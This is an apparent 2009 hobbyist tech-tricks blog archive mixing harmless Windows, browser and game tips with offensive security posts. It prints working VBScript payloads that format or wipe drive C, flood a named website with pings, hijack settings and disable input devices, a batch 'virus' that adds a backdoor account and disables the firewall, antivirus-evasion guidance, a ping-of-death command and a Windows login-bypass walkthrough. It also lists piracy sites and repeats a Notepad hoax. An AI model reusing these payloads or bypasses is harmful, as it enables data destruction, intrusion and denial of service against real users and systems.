As an example, consider the scenario you are checking mails of your Gmail account and at the same time you want to check another gmail account. What you normally do is open up another Gmail account in another browser. Another similar situation often encountered by many orkuttians who have multiple orkut profiles!

Now from firefox 2.0+ onwards this is solved and you can run firefox with as many accounts as you want! Here comes one of the most awaited trick!

#1. Creating a Profile.

By default firefox runs in default profile. To run another instance of firefox with different profile you need to create first a different profile. To do this run firefox with command line parameter CreateProfile followed by profile name.

Window user, can click on “Start -> Run” and execute firefox with followed by the command line arguments. For example,

"C:\Program Files\Mozilla Firefox\firefox.exe" -CreateProfile Piyush

where Piyush is name of the profile. You can use any name.

(Note that the path C:\Program Files\Mozilla Firefox\ may change as per your installation directory.)

On similar lines Linux and Mac OS user can create a new profile.

#2. Running firefox with new profile.
First start firefox the way you start. (This is to assure you that we are going in right direction).
Now Windows users can again click on “Start -> Run” and execute firefox with followed by the command line arguments,

"C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -P Piyush

where Piyush need to be replaced by the name of the profile you have used in step 1 while creating a new profile.

When you hit ENTER the profile will start in new context!
The key here is -no-remote command-line argument!

Another tricks:-

You will probably use two or more profiles frequently. In that case the step 2 to run firefox with a new profile will need to be tweaked!
In simplest way Windows user can right-click on existing firefox shortcut and select copy option from right-click menu.
Then paste it at your favorite place (probably desktop)
[optional] It may appear with name like Copy of Mozilla Firefox, change it to some convenient name like Rahuls Firefox or New Firefox or anything you like.
Now again right-click on new shortcut and click on properties option in right-click menu.
Switch to shortcut tab in properties window.
In target you may find - “C:\Program Files\Mozilla Firefox\firefox.exe” change it to something like “C:\Program Files\Mozilla Firefox\firefox.exe” -no-remote -P Piyush.Or you can gate a menu to chose profile if u change the target to"C:\Program Files\Mozilla Firefox\firefox.exe" -p .
Now click OK.

==================================== SOME VBSCRIPT PAYLOADS ====================================

2009-03-28T18:49:00.003+05:30

--------Loop floppy disk read--------

Description: This payloads has to be one of the most annoying

non-damaging payloads that I can think of. It simply makes the

floppy disk drive read at an infinate loop.

Here is the code:

-------------------------------------

On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

Set DriveA = fso.GetDrive("A:")

Do

If DriveA.IsReady Then DiskReady = True

Loop

-------------------------------------

--------DoS (Denial of Service) attack---------

Description: This code basically Pingfloods a specific webpage,

Link, FTP or whatever. However, just one computer doing a Pingflood

will not cause much damage, but if at least 30 computers were doing it,

it would.

Here is the code:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

wsc.Run "Ping.exe -t -l 916 www.azoogle.com", 0, False

-------------------------------------

--------Change IE (Internet Explorer) hoomepage--------

Description: This just changes the homepage of IE using the registry.

Here is the code0:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

wsc.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.rrlf.de/"

-------------------------------------

--------File/Link execution loop---------

Decription: This code basically executes a File or web link on

a loop.

Here is the code:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

Do

wsc.Run "http://www.rrlf.de/", 3, False

Loop

-------------------------------------

--------Change PC Owner name--------

You can change the computers

owner name by using the registry. By changing the owner name,

it would change the login name, user info, installation info, etc that

involves the computers owner name.

Here is the code:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner", "Zed/[rRlf]"

-------------------------------------

--------Change PC Organization name---------

Decription: This is basically the same as the 'Change PC Owner'

component above.

Here is the code:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization", "Zed Australia"

-------------------------------------

--------Format loop--------

Description: This code writes a batch command to format the computer

on the next system boot.

Here is the code:

-------------------------------------

On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

If fso.FileExists("C:\Autoexec.bat") Then

Set WriteFormat = fso.OpenTextFile("C:\Autoexec.bat", 8)

WriteFormat.WriteLine "Echo y | Format C:"

WriteFormat.Close

-------------------------------------

--------Drive C Erase--------

Description: Practically the same as the format loop, but it happens

on the execution of the code, which is far more dangerous.

Here is the code:

-------------------------------------

On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

Set wsc = CreateObject("WScript.Shell")

Set WriteFormat2 = fso.CreateTextFile("C:\Angry.bat", True)

WriteFormat2.WriteLine "Deltree /y *.*"

WriteFormat2.Close

wsc.Run "C:\Angry.bat", 0, False

-------------------------------------

--------Disable Keyboard and/or Mouse---------

Description: Really annoying, just uses the registry to disable the

Keyboard and/or Mouse.

Here is the code:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

RegServ = "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"

wsc.RegWrite RegServ & "\DisableKeybaord", "Rundll32.exe Keyboard,Disable"

wsc.RegWrite RegServ & "\DisableMouse", "Rundll32.exe Mouse,Disable"

-------------------------------------

--------Shut down loop--------

Decription: Just keeps shutting down the computer when windows starts

(very annoying).

Here is the code:

-------------------------------------

On Error Resume Next

Set wsc = CreateObject("WScript.Shell")

wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ShutDownWindows", "Rundll32.exe User,ExitWindows"

-------------------------------------

TO ENABLE REGEDIT WHICH HAS BEEN DISABLED BY VIRUS

2009-03-28T18:46:00.001+05:30

Copy Dis Code In A Notepad

[version]

signature=$chicago$

[defaultinstall]

delreg=regedit

[regedit]

HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,"DisableRegistryTools"

HKLM,Software\Microsoft\Windows\CurrentVersion\Policies\System,"DisableRegistryTools"

[End]

Go To File>Save As...>

And Save It As Enable regedit.inf

Then Right Click On the Saved file and Select Install

GTALK TRICKS

2009-03-28T18:44:00.000+05:30

Ctrl + E - It centralizes the selected text, or the current line.

Ctrl + R - It justifies to the right the selected text, or the current line.

Ctrl + L - It justifies to the left the selected text, or the current line.

Ctrl + I - The same thing does that Tab.

Tab - It is giving the area to each of the windows opened by Google Talk.

Ctrl + Tab - The same thing does that Shift + Tab .

Shift + Tab - The same thing does that Tab but in reverse.

Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers

Ctrl + 1 (KeyPad) - It does a simple space between the lines.

Ctrl + 2 (KeyPad) - It does a double space between the lines.

Ctrl + 5 (KeyPad) - A space does 1.5 between the lines.

Ctrl + 1 (NumPad) - It goes at the end of the last line.

Ctrl + 7 (NumPad) - It goes at the begin of the last line.

Ctrl + F4 - It closes the current window.

Alt + F4 - It closes the current window.

Alt + Esc - It Minimize all the windows.

Windows + ESC - Open Google Talk (if it's minimized, or in the tray)

F9 - Open Gmail to send an email to the current contact.

F11 - It initiates a telephonic call with your friend.

F12 - It cancels a telephonic call.

Esc - It closes the current window.

CREATE A NEW UNDETECTABLE VIRUS IN 3 EASY STEPS

2009-03-28T18:25:00.002+05:30

This article will demonstrate how an average PC user can create a piece of
malicious software in minutes that will be undetected by all the major
anti-malware scanning engines.

This article is for informational purposes only .

It is well-known in blackhat circles that a new piece of malware, coded from
scratch, will almost always bypass signature-based malware scanners. What is
less known is that the skill needed to do this is minimal at best - an average
user with no programming experience can cut and paste a few lines of code
together and create a undetected malicious executable in 3 easy steps.

Most anti-virus scanners rely on a database of signatures for known viruses.
Once a new virus is spread wide enough that it has been identified as malicious,
the anti-virus vendors scramble to come up with a fingerprint to identify that
strain of malware in the future. The obvious flaw in this process is that a new
piece of malware will bypass the scanners by default, until it is widespread
enough to be noticed by security researchers or picked up by a dummy node. There
is always a window of opportunity for new malware between the time of deployment.

Step 1: Commands to execute

Here we compile the DOS commands that our malware will execute into a DOS batch
file. As a simple proof of concept, let’s add a new user, disable the XP
firewall, and create a directory on the C drive.

@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed

Save the above as a filename.bat

Step 2: Compile to an executable

Experienced DOS users may remember a number of utilities that were able to
convert a batch file into an executable (com or exe). These tools basically wrap
a shell call around each of our commands and bundle the whole thing up into a
tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine
in 1990.

creating our malware

Our tiny executable COM file is ready to go.

Step 3: Test and Deploy

We now have a custom executable that runs some obvoiusly malicious commands:
disabling the firewall and adding a new user. If we were to email this file to a
target, surely any modern anti-virus scanner would pick this up as a simple
batch file and alert us to the malicious code… right?
No patterns exist for this new piece of malware - it’s unrecognised by
signature-based scanners. Heuristics and sandboxing may alert to suspicious
activity, or email filtering may prevent our executable from reaching the
target, but the primary mechanism of anti-malware protection has been defeated
in a matter of seconds with little knowledge or skill on the part of the
attacker. If the target user were to run our executable, the only indication of
malicious activity would be a command prompt quickly appearing and disappearing
on the desktop.

Step 4 (Optional):

A typical malware author would take the created executable and mangle it in
various ways to make it harder to detect - using tools such as encrypters,
packers, scramblers and EXE binders. The malicious code may be bundled with a
legitimate executable, or packed with a rootkit or other remote access utility.

Example: Creating a simple dropper

A dropper is a small piece of malware designed to “drop” another peice of
malware onto a system. It usually comes in the form of a simple executable that,
when executed, retrieves a file from a hardcoded web or ftp site and executes it
(usually a rootkit or botnet suite).

NOTEPAD TRICKS

2009-03-25T17:21:00.002+05:30

Notepad Trick !

Well quite old but here is the complete collection of notepad tricks.

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...

or

Open Notepad
Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
DON'T hit enter at the end of the line.
Save the file.
Close Notepad.
Reopen Notepad.
Open the file you just saved.

WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

~ cheers ~

NOTEPAD "world trade center trick"

Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

HIDDEN PROGRAMS IN WINDOWS XP

2009-03-21T21:51:00.002+05:30

Programs :

1. Private Character Editor :

Used for editing fonts,etc.
** start>>Run
** Now, type eudcedit

2. Dr. Watson :

This an inbuilt windows repairing software !
** start>>Run
** Now, type drwtsn32

3. Media Player 5.1 :

Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!
** start>>Run
** Now, type mplay32

4. iExpress :

Used to create SetupsYou can create your own installers !
** start>>Run
** Now, type iexpress

HIDDEN MUSIC

Microsoft Windows XP is playing a cool music during installation. It is a pleasant little tune that you’ve probably never heard, unless you were present when Windows was being installed on your PC. After that it’s never played again, unless you know where to look for it.

To hear what you’ve been missing, just follow these:

Make you way to C:\WINDOWS\system32\oobe\images and look for a file called "Title.wma" or possibly "Windows welcome music.wma".

It is around 2.56Mb in size. Just double click the file and this will open Windows Media Player, or your defaul player and it will proceed to serenade you with a more than 5 minutes music.

TOP TEN TIPS TO IMPROVE YOUR SYSTEM

2009-03-20T05:22:00.002+05:30

Here's the Top Ten Tips To Improve Your Windows System More Speedy:
1. Let your PC boot up completely before opening any applications.
2. Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3. Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).It takes much more memory from RAM.
4. Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM.
5. Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6. Delete the temporary internet files regularly.
7. Defragment your hard drive once every 15 days. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8. Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9. When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.

RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!

METHODS OF VIRUS CODE

2009-03-18T07:35:00.002+05:30

VIRUS INFACTION

A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of host that viruses sometimes avoid is bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus:

Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program that has been infected by the virus.

Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus.

Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system.

Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'.

A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.

STEALTH

Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software’s request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it seems that the file is "clean". Modern anti-virus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean.

SELF MODIFICATION

Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.

ENCRYPTION WITH A VARIABLE KEY

A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Since these would be symmetric keys, stored on the infected host, it is in fact entirely possible to decrypt the final virus, but that probably isn't required, since self-modifying code is such a rarity that it may be reason for virus scanners to at least flag the file as suspicious.

An old, but compact, encryption involves XORing each byte in a virus with a constant, so that the exclusive-or operation had only to be repeated for decryption. It is suspicious code that modifies itself, so the code to do the encryption/decryption may be part of the signature in many virus definitions.

POLYMORPHIC CODE

Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts which remain identical between infections, making it very difficult to detect directly using signatures. Anti-virus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body.

Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.

METAMORPHIC CODE

To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly language code, 90% of which is part of the metamorphic engine.

ALL ABOUT DOS ATTACKS

2009-03-17T19:29:00.001+05:30

DOS ATTACK

DOS Attacks or Denial Of Services Attack have become very common amongst Hackers who use them as a path to fame and respect in the underground groups of the Internet. Denial of Service Attacks basically means denying valid Internet and Network users from using the services of the target network or server. It basically means, launching an attack, which will temporarily make the services, offered by the Network unusable by legitimate users.

In others words one can describe a DOS attack, saying that a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users. Or you send the target system data packets, which cannot be handled by it and thus causes it to either crash, reboot or more commonly deny services to legitimate users.

TYPES OF DOS ATTACKS

1.Those that exploit vulnerabilities in the TCP/IP protocols suite.
2.Those that exploit vulnerabilities in the Ipv4 implementation.
3 There are also some brute force attacks, which try to use up all resources of the target system and make the services unusable.

Before I go on with DOS attacks, let me explain some vulnerabilities in TCP/IP itself. Some common vulnerabilities are Ping of Death, Teardrop, SYN attacks and Land Attacks.

PING OF DEATH

This vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them to reboot) so that no users can use its services. This exploit no longer works, as almost all system administrators would have upgraded their systems making them safe from such attacks.

In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attack could be carried out even through the command line, in the following manner:

The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim's computer:

C:\windows>ping -l 65540 ipaddress

TRARDROP

The Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is being sent over the Internet, it is broken down into smaller fragments at the source system and put together at the destination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number of packets, with each packet carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets, then:

The first Packet will carry data from 1 byte to 1500 bytes
The second Packet will carry data from 1501 bytes to 3000 bytes
The third packet will carry data from 3001 bytes to 4000 bytes

These packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to which byte does that particular data packet carries data or the range of data that it is carrying. This along with the sequence numbers helps the destination system to reassemble the data packets in the correct order. Now in this attack, a series of data packets are sent to the target system with overlapping Offset field values. As a result, the target system is not able to reassemble the packets and is forced to crash, hang or reboot.

Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet)

Normally a system receives data packets in the following form, with no overlapping Offset values.
_ _ _ _ _ _ _ _ _
(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)

Now in a Teardrop attack, the data packets are sent to the target computer in the following format:

_ _ _ _ _ _ _ _
(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)

When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot.

SYN ATTACK

The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how SYN Attacks work, you need to first know how TCP/IP establishes a connection between two systems. Whenever a client wants to establish a connection with a host, then three steps take place. These three steps are referred to as the three-way handshake.

In a normal three way handshake, what happens is that, the client sends a SYN packet to the host, the host replies to this packet with a SYN ACK packet. Then the client responds with a ACK (Acknowledgement) packet. This will be clearer after the following depiction of these steps-:

Client --------SYN Packet--------------a Host

In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-way connection. The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of the client, which is needed by the host to put back the fragmented data in the correct sequence.

Host -------------SYN/ACK Packet----------à Client

In the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packet sent by the client and sends the client its own ISN.

Client --------------ACK-----------------------à Host

In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a ACK packet.

These three steps together are known as the 3-way handshake and only when they are completed is a complete TCP/IP connection established.

In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad source IP Address. When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of them with a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thus queues up all these requests until it receives an ACK message. The requests are not removed unless and until, the remote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the target machine.

To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have a Bad Source IP, they queue up, use up resources and memory or the target system and eventually crash, hang or reboot the system.

LAND ATTACKS

A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP Address, the IP address of the target system itself is used. This creates an infinite loop between the target system and the target system itself. However, almost all systems have filters or firewalls against such attacks.

SMURF ATTACKS

A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses from within the target network. As and when the router gets a PING message, it will route it or echo it back, in turn flooding the Network with Packets, and jamming the traffic. If there are a large number of nodes, hosts etc in the Network, then it can easily clog the entire network and prevent any use of the services provided by it.

UDP FLOODING

This kind of flooding is done against two target systems and can be used to stop the services offered by any of the two systems. Both of the target systems are connected to each other, one generating a series of characters for each packet received or in other words, requesting UDP character generating service while the other system, echoes all characters it receives. This creates an infinite non-stopping loop between the two systems, making them useless for any data exchange or service provision.

DISTRIBUTED DOS ATTACKS

DOS attacks are not new; in fact they have been around for a long time. However there has been a recent wave of Distributed Denial of Services attacks which pose a great threat to Security and are on the verge of overtaking Viruses/Trojans to become the deadliest threat to Internet Security. Now you see, in almost all of the above TCP/IP vulnerabilities, which are being exploited by hackers, there is a huge chance of the target's system administrator or the authorities tracing the attacks and getting hold of the attacker.

Now what is commonly being done is, say a group of 5 Hackers join and decide to bring a Fortune 500 company's server down. Now each one of them breaks into a smaller less protected network and takes over it. So now they have 5 networks and supposing there are around 20 systems in each network, it gives these Hackers, around 100 systems in all to attack from. So they sitting on there home computer, connect to the hacked less protected Network, install a Denial of Service Tool on these hacked networks and using these hacked systems in the various networks launch Attacks on the actual Fortune 500 Company. This makes the hackers less easy to detect and helps them to do what they wanted to do without getting caught. As they have full control over the smaller less protected network they can easily remove all traces before the authorities get there.

Not even a single system connected to the Internet is safe from such DDOS attacks. All platforms Including Unix, Windows NT are vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used to conduct such DDOS attacks.

HACKING WINDOWS XP IN 3 MINUTES

2009-03-16T17:05:00.002+05:30

There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE:-http://rapidshare.com/files/32846408/dreampackpl.zip
3. Unzip the downloaded dreampackpl.zip and you'll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see windows 2000 Setup and it will load some files.
6. Press "R" to install DreamPackPL.
7. Press "C" to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)
11. Type "exit", take out disk and reboot.
12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type "god" in the password field to get in Windows.

You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.

WINDOWS GAME CHEATS

2009-03-14T17:34:00.001+05:30

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Pinball

Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting

FreeCell

Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.

Solitaire

Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

Infinite Points

In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the "A" key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!

Infinite points trick II

To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.

-----------------------------------------------------------------
registry hack which will allow you to see your opponents' cards
----------------------------------------------------------------- Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.

GOOD BIT TORRENT SEARCH ENGINES

2009-03-14T05:11:00.002+05:30

1. The Pirate Bay, by readership size, is the most popular torrent search site today. Pirate Bay also has an immense database of 600,000+ torrents, the single largest database available on the web.

2. Isohunt.com
(July 2008: Isohunt has over 450,000 torrents in their database. Isohunt is also being sued by the Motion Picture Association of America (MPAA). If you want to use this tremendous Canadian site, you better use it while you can. Note: any torrent listed as "ISOhunt release" means that it is a file verified by the administrators...a nice feature to help you get authentic torrents, not fake files.)

3. Demonoid.com (Demonoid is a true reader favorite. Alas, Demonoid is membership based, and open memberships only occur one day each month. Be patient and check Demonoid every day if you wish to join. Otherwise, you will need a referring member to invite you.)

4. Torrentscan.com (a meta-search engine: Torrenscan is a search engine that searches other torrent search engines)

5. Torrentspy.com offers over 420,000 torrents in its database, one of the largest torrent indices that is readily available to the public. Enjoy it while you can.

6. Special Mention: TV Links UK **Special Mention: (Fabulous! This site streams the latest TV episodes. That means, once you install the special DivX Web Player, you can see the latest popular television series without having to fully download them. Wait time to start watching a TV show is about 20 seconds on cable modem.)

7. Special Mention: ShareTV.org (ShareTV is dedicated to sharing television episodes and entire TV series. Find "24", "Heroes", and "Lost" episodes here. Special thanks to Chris R. for telling us about his web site.)

8. Special Mention: Movie and Subtitles dot Net (http://www.moviesandsubtitles.net/ is another metasearch engine that scours other torrent sites for you. Special thanks to reader Boris for this web site submission.)

9. Special Mention: Torrent-finder.com (Several readers from the central USA submitted this site recently. This site is gaining a bigger readership every day.)

10. Special mention: Mininova.org has 170,000 torrents indexed as of May, 2007. Mininova is the successor to Suprnova, one of the original big torrent databases of the Web.

CONVERT HOST NAME TO IP ADDRESS OR VICE VERSA

2009-03-14T02:33:00.002+05:30

The process of finding the IP address is achieved by searching the DNS (Domain Name Servers) until a match on the domain name is found. This process is also known as DNS lookup, NSLOOKUP or (erroneously) IP lookup.

The process of finding the host name (or domain name) from an IP address involves sending a message to the IP address and requesting the computer located at that IP address to return its name. Usually this will be the same as the domain name. However, many computers host many domains so the host name may be one of the domain names hosted or it could be something totally different.

There are some special IP addresses. 127.0.0.1 is always the IP address of every computer. No matter which computer you use, it will always have an IP address of 127.0.0.1 and a name of 'localhost'. In addition, a computer can have more than one IP address. In order to connect to other computers it will have an IP address that is known to other computers.

Host Name or Domain Name:

There is often confusion about what is a host name and what is a domain name.
